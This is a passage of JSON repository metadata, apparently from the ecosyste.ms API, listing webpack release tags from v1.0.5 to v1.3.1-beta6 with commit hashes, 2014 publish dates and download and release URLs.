positories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub